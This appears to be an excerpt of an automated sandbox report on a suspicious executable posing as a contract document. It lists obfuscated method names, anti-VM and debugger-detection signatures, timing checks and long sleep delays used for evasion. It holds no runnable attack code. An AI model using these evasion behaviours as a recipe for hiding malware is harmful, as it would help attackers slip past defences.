                Source: 0.2.draft contract for order #782334.exe.4b09448.0.raw.unpack, dOnqtYxW6fCr5C4gUB.csHigh entropy of concatenated method names: 'U3TKkLgrVW', 'BTDKR5h1A2', 'cXDKgJjygf', 'cIhKiu7V1a', 'XODKr4fcMQ', 'kXjK9YPXk1', 'e4ZKjLIhiT', 'WVGKuk3Fws', 'cZWKXf3bsd', 'nuLKDpcSyD'
                Source: 0.2.draft contract for order #782334.exe.4b09448.0.raw.unpack, uAPtON66OIsqQN9BPw5.csHigh entropy of concatenated method names: 'ToString', 'c440d1xdYX', 'jhF02twn86', 'WGm0lu3HH7', 'TLP0x91Dmp', 'YxE0V16CPS', 'UcI0W3FHSy', 'Mos0vV5hEB', 'jSIMnXGFLqOKjlHV8mW', 'igfZERGcFUbi4KBNHYj'
                Source: 0.2.draft contract for order #782334.exe.4b09448.0.raw.unpack, eku3ZZQJyWRgCApSxB.csHigh entropy of concatenated method names: 'J063am5ZX0', 'ewl3fS2Aj4', 'spr3B1MQmN', 'W673UlPoBB', 'xVo3mHA3Ww', 'rFE3sxJGQQ', 'W1IXvRljgfOqo2K3yp', 'jtGJ6swDYso4GQCoiv', 'YOr33jTc9v', 'aoe3dMkkab'
                Source: 0.2.draft contract for order #782334.exe.4b09448.0.raw.unpack, lGFC0HIiY7o3iUEU6U.csHigh entropy of concatenated method names: 'ToString', 'YsQsDvWdtH', 'rROsiQtjkv', 'cvPsouMdga', 'iR4srtbQU2', 'Q61s98Tpbf', 'MnZsZQL8Bp', 'H6OsjJSIf3', 'mqMsungxwt', 'KjLsGeUCnX'
                Source: 0.2.draft contract for order #782334.exe.4b09448.0.raw.unpack, t2pR6skCicQqKjshfc.csHigh entropy of concatenated method names: 'KMkvPmFXiH', 'vmlvnWWnDf', 'tj5WoNDxd7', 'wPcWre7LPh', 'GM3W93EvIL', 'sZ9WZL1s1X', 'odaWjhOFt8', 'dV4WuGFbl3', 'lvmWGTD3Nd', 'cYkWXRY8eQ'
                Source: 0.2.draft contract for order #782334.exe.4b09448.0.raw.unpack, brGu3hc2hcqi3Ph5uR.csHigh entropy of concatenated method names: 'xja4Oxn2tDAi3TwbaLw', 'Uu1MTHnm9ZyBt0xqqr8', 'TlitSIp6MV', 'aYttp67fce', 'obBt0P8gW0', 'df7IN2nK7F08Xx4yl5T', 'YNYQdLnfEyrSw1fZvfw'
                Source: 0.2.draft contract for order #782334.exe.4b09448.0.raw.unpack, Daa9x6p8K4JlMbJdQy.csHigh entropy of concatenated method names: 'zMK7NNJhG', 'FaKIdXcVr', 'ONf1af93v', 'Rcjn9y8i0', 'LfVRtj2h7', 'uuyTtqkoV', 'yMOmhj9V3RvkrIEZFh', 'bkH9SFUGO8Av7xIcZI', 'GsFSCKwrC', 'v5l0Q37ub'
                Source: 0.2.draft contract for order #782334.exe.4b09448.0.raw.unpack, BZkO9lBsWxu4CvMeio.csHigh entropy of concatenated method names: 'txgtlqkyOs', 'CKjtVfV1ti', 'jBYtv2tTxc', 'FvFtaQnOYT', 'xLatfUOS4Z', 'EO3vM4Q77U', 'UCwvCtGd0C', 'u9mvFBRUjX', 'lUovOEpSpO', 'MP4vNiGG2R'
                Source: 0.2.draft contract for order #782334.exe.4b09448.0.raw.unpack, FClwO49SKVoyopkRBu.csHigh entropy of concatenated method names: 'CQ4ayPNaAd', 'mK4abtA49k', 'l7Ra7Pa1QB', 'jMGaIg5brW', 'NmwaPZKhUR', 'jKea1oSRAN', 'TadanqYJuV', 'jnVakPYLID', 'IgGaRMStto', 'WkiaTrC91L'
                Source: 0.2.draft contract for order #782334.exe.4b09448.0.raw.unpack, Xr6bVuWI8Xsm8tjknr.csHigh entropy of concatenated method names: 'TsFp3rI3Jx', 'fGfpdSwFud', 'pwPp2WnuTa', 'TOepxpetsm', 'MoypVpMRm6', 'tfPpvuhvOn', 'gyAptaphPb', 'gptSFnUXEI', 'r46SOlH4lV', 'ANQSN8xgQk'
                Source: 0.2.draft contract for order #782334.exe.4b09448.0.raw.unpack, HVj9taPB6orrMyXKMK.csHigh entropy of concatenated method names: 'R00VAUXSTa', 'DGgV608fWW', 'fkPVLZnEtS', 'luDVwX72Ph', 'um6VMKMB2S', 'O9gVC4yrtv', 'UWGVFeIUib', 'WDPVOXSMp0', 'QXSVNyccTq', 'j0IV4fqEr9'
                Source: 0.2.draft contract for order #782334.exe.4b09448.0.raw.unpack, aRsIYS6aC76so6fOE9u.csHigh entropy of concatenated method names: 'UutpynFH5f', 'VrKpbtmqpF', 'VEXp7Bq6Ub', 'fvqpIskQxb', 'iZLpPuP29S', 'vL0p1mGbuC', 'n0GpnHtcQr', 'iuepkLr4uN', 'QR9pRagyRJ', 'eDppTMhHgy'
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: draft contract for order #782334.exe PID: 6212, type: MEMORYSTR
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\PATHPING.EXEAPI/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\PATHPING.EXEAPI/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\PATHPING.EXEAPI/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\PATHPING.EXEAPI/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\PATHPING.EXEAPI/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\PATHPING.EXEAPI/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\PATHPING.EXEAPI/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\PATHPING.EXEAPI/Special instruction interceptor: Address: 7FFE2220DA44
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeMemory allocated: 1720000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeMemory allocated: 3040000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeMemory allocated: 5040000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeMemory allocated: 8FD0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeMemory allocated: 9FD0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeMemory allocated: A1D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeMemory allocated: B1D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeMemory allocated: BC30000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeMemory allocated: CC30000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeMemory allocated: DC30000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0174096E rdtsc 2_2_0174096E
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXEWindow / User API: threadDelayed 1681Jump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXEWindow / User API: threadDelayed 8292Jump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\PATHPING.EXEAPI coverage: 2.6 %
                Source: C:\Users\user\Desktop\draft contract for order #782334.exe TID: 6192Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXE TID: 3852Thread sleep count: 1681 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXE TID: 3852Thread sleep time: -3362000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXE TID: 3852Thread sleep count: 8292 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXE TID: 3852Thread sleep time: -16584000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe TID: 3228Thread sleep time: -75000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe TID: 3228Thread sleep count: 35 > 30Jump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe TID: 3228Thread sleep time: -52500s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe TID: 3228Thread sleep count: 38 > 30Jump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe TID: 3228Thread sleep time: -38000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXELast function: Thread delayed
                Source: C:\Windows\SysWOW64\PATHPING.EXELast function: Thread delayed
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_02BBC160 FindFirstFileW,FindNextFileW,FindClose,7_2_02BBC160
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: RprkEKYwQARXc.exe, 00000008.00000002.4135270406.000000000104F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllO
                Source: firefox.exe, 00000009.00000002.2387837212.0000013842F3C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll1
                Source: PATHPING.EXE, 00000007.00000002.4134882508.00000000030EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXEProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0174096E rdtsc 2_2_0174096E
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_00417513 LdrLoadDll,2_2_00417513
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017D4164 mov eax, dword ptr fs:[00000030h]2_2_017D4164
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017D4164 mov eax, dword ptr fs:[00000030h]2_2_017D4164
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01798158 mov eax, dword ptr fs:[00000030h]2_2_01798158
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01706154 mov eax, dword ptr fs:[00000030h]2_2_01706154
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01706154 mov eax, dword ptr fs:[00000030h]2_2_01706154
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_016FC156 mov eax, dword ptr fs:[00000030h]2_2_016FC156
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01794144 mov eax, dword ptr fs:[00000030h]2_2_01794144
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01794144 mov eax, dword ptr fs:[00000030h]2_2_01794144
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01794144 mov ecx, dword ptr fs:[00000030h]2_2_01794144
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01794144 mov eax, dword ptr fs:[00000030h]2_2_01794144
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01794144 mov eax, dword ptr fs:[00000030h]2_2_01794144
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01730124 mov eax, dword ptr fs:[00000030h]2_2_01730124
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017AA118 mov ecx, dword ptr fs:[00000030h]2_2_017AA118
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017AA118 mov eax, dword ptr fs:[00000030h]2_2_017AA118
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017AA118 mov eax, dword ptr fs:[00000030h]2_2_017AA118
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017AA118 mov eax, dword ptr fs:[00000030h]2_2_017AA118
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017C0115 mov eax, dword ptr fs:[00000030h]2_2_017C0115
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017AE10E mov eax, dword ptr fs:[00000030h]2_2_017AE10E
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017AE10E mov ecx, dword ptr fs:[00000030h]2_2_017AE10E
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017AE10E mov eax, dword ptr fs:[00000030h]2_2_017AE10E
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017AE10E mov eax, dword ptr fs:[00000030h]2_2_017AE10E
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017AE10E mov ecx, dword ptr fs:[00000030h]2_2_017AE10E
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017AE10E mov eax, dword ptr fs:[00000030h]2_2_017AE10E
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017AE10E mov eax, dword ptr fs:[00000030h]2_2_017AE10E
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017AE10E mov ecx, dword ptr fs:[00000030h]2_2_017AE10E
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017AE10E mov eax, dword ptr fs:[00000030h]2_2_017AE10E
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017AE10E mov ecx, dword ptr fs:[00000030h]2_2_017AE10E
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017301F8 mov eax, dword ptr fs:[00000030h]2_2_017301F8
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017D61E5 mov eax, dword ptr fs:[00000030h]2_2_017D61E5
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0177E1D0 mov eax, dword ptr fs:[00000030h]2_2_0177E1D0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0177E1D0 mov eax, dword ptr fs:[00000030h]2_2_0177E1D0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0177E1D0 mov ecx, dword ptr fs:[00000030h]2_2_0177E1D0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0177E1D0 mov eax, dword ptr fs:[00000030h]2_2_0177E1D0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0177E1D0 mov eax, dword ptr fs:[00000030h]2_2_0177E1D0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017C61C3 mov eax, dword ptr fs:[00000030h]2_2_017C61C3
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017C61C3 mov eax, dword ptr fs:[00000030h]2_2_017C61C3
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0178019F mov eax, dword ptr fs:[00000030h]2_2_0178019F
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0178019F mov eax, dword ptr fs:[00000030h]2_2_0178019F
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0178019F mov eax, dword ptr fs:[00000030h]2_2_0178019F
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0178019F mov eax, dword ptr fs:[00000030h]2_2_0178019F
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01740185 mov eax, dword ptr fs:[00000030h]2_2_01740185
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017BC188 mov eax, dword ptr fs:[00000030h]2_2_017BC188
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017BC188 mov eax, dword ptr fs:[00000030h]2_2_017BC188
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_016FA197 mov eax, dword ptr fs:[00000030h]2_2_016FA197
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_016FA197 mov eax, dword ptr fs:[00000030h]2_2_016FA197
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_016FA197 mov eax, dword ptr fs:[00000030h]2_2_016FA197
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017A4180 mov eax, dword ptr fs:[00000030h]2_2_017A4180
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017A4180 mov eax, dword ptr fs:[00000030h]2_2_017A4180
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0172C073 mov eax, dword ptr fs:[00000030h]2_2_0172C073
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01702050 mov eax, dword ptr fs:[00000030h]2_2_01702050
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01786050 mov eax, dword ptr fs:[00000030h]2_2_01786050
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01796030 mov eax, dword ptr fs:[00000030h]2_2_01796030
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_016FA020 mov eax, dword ptr fs:[00000030h]2_2_016FA020
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_016FC020 mov eax, dword ptr fs:[00000030h]2_2_016FC020
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0171E016 mov eax, dword ptr fs:[00000030h]2_2_0171E016
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0171E016 mov eax, dword ptr fs:[00000030h]2_2_0171E016
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0171E016 mov eax, dword ptr fs:[00000030h]2_2_0171E016
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0171E016 mov eax, dword ptr fs:[00000030h]2_2_0171E016
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01784000 mov ecx, dword ptr fs:[00000030h]2_2_01784000
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017A2000 mov eax, dword ptr fs:[00000030h]2_2_017A2000
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017A2000 mov eax, dword ptr fs:[00000030h]2_2_017A2000
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017A2000 mov eax, dword ptr fs:[00000030h]2_2_017A2000
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017A2000 mov eax, dword ptr fs:[00000030h]2_2_017A2000
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017A2000 mov eax, dword ptr fs:[00000030h]2_2_017A2000
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017A2000 mov eax, dword ptr fs:[00000030h]2_2_017A2000
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017A2000 mov eax, dword ptr fs:[00000030h]2_2_017A2000
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017A2000 mov eax, dword ptr fs:[00000030h]2_2_017A2000
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017420F0 mov ecx, dword ptr fs:[00000030h]2_2_017420F0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_016FA0E3 mov ecx, dword ptr fs:[00000030h]2_2_016FA0E3
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017860E0 mov eax, dword ptr fs:[00000030h]2_2_017860E0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017080E9 mov eax, dword ptr fs:[00000030h]2_2_017080E9
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_016FC0F0 mov eax, dword ptr fs:[00000030h]2_2_016FC0F0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017820DE mov eax, dword ptr fs:[00000030h]2_2_017820DE
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017C60B8 mov eax, dword ptr fs:[00000030h]2_2_017C60B8
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017C60B8 mov ecx, dword ptr fs:[00000030h]2_2_017C60B8
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_016F80A0 mov eax, dword ptr fs:[00000030h]2_2_016F80A0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017980A8 mov eax, dword ptr fs:[00000030h]2_2_017980A8
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0170208A mov eax, dword ptr fs:[00000030h]2_2_0170208A
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017A437C mov eax, dword ptr fs:[00000030h]2_2_017A437C
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0178035C mov eax, dword ptr fs:[00000030h]2_2_0178035C
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0178035C mov eax, dword ptr fs:[00000030h]2_2_0178035C
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0178035C mov eax, dword ptr fs:[00000030h]2_2_0178035C
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0178035C mov ecx, dword ptr fs:[00000030h]2_2_0178035C
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0178035C mov eax, dword ptr fs:[00000030h]2_2_0178035C
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0178035C mov eax, dword ptr fs:[00000030h]2_2_0178035C
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017A8350 mov ecx, dword ptr fs:[00000030h]2_2_017A8350
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017CA352 mov eax, dword ptr fs:[00000030h]2_2_017CA352
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01782349 mov eax, dword ptr fs:[00000030h]2_2_01782349
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01782349 mov eax, dword ptr fs:[00000030h]2_2_01782349
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01782349 mov eax, dword ptr fs:[00000030h]2_2_01782349
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01782349 mov eax, dword ptr fs:[00000030h]2_2_01782349
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01782349 mov eax, dword ptr fs:[00000030h]2_2_01782349
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01782349 mov eax, dword ptr fs:[00000030h]2_2_01782349
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01782349 mov eax, dword ptr fs:[00000030h]2_2_01782349
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01782349 mov eax, dword ptr fs:[00000030h]2_2_01782349
